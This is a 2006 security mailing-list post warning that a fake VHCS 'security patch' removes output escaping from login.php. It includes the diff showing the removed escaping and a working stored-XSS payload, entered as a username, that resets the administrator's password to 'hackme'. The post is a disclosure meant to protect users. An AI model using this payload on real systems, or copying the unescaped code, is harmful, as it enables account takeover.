lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <43E65B67.8000707@rs-labs.com>
Date: Sun Feb  5 20:09:32 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: VHCS Security Patch - 2006-02-05 --> Fake!


Hi,

I've just visited VHCS main page and noticed the following "security patch":

http://vhcs.net/new/modules/news/article.php?storyid=23

It reads:

"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php

Just replace the file
"

Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your
VHCS installation vulnerable to a high severity cross-site-scripting issue!

See it:
login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php  --> login.php from "security patch"

roman@...labs:~$ diff login_orig_unix.php login_new_unix.php
38c38
<               write_log("Login error, <b><i>".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
>               write_log("Login error, <b><i>".$uname."</i></b> unknown
username");
75c75
<
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
---
>
write_log( $uname." Domain status is not OK - user can not login");
104c104
<                       write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
---
>                       write_log( $uname." user logged in.");
112c112
<               write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
---
>               write_log( $uname." bad password login data.");
190c190
<                       write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
---
>                       write_log($uname." user session timed out");
199c199
<               write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
---
>               write_log($uname." bad session data.");
258a259
>       die();
261a263
> }
437c439
< }
---
> //}
roman@...labs:~$


As you can see, the "patch" removes htmlspecialchars() calls letting
login.php vulnerable . Nasty...

If you apply the "patch" (or have an old VHCS install, for instance
version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
exploit it by entering the following as "username" (in the login entry
page):

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input
name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
name="uaction"
value="updt_pass"></form><script>document.dsr.submit()</script>

When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his
password will be set up to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is letting change
password without supplying the old one (Alex, please, fix it in next
release!).

Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply patch.

-- 

Cheers,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ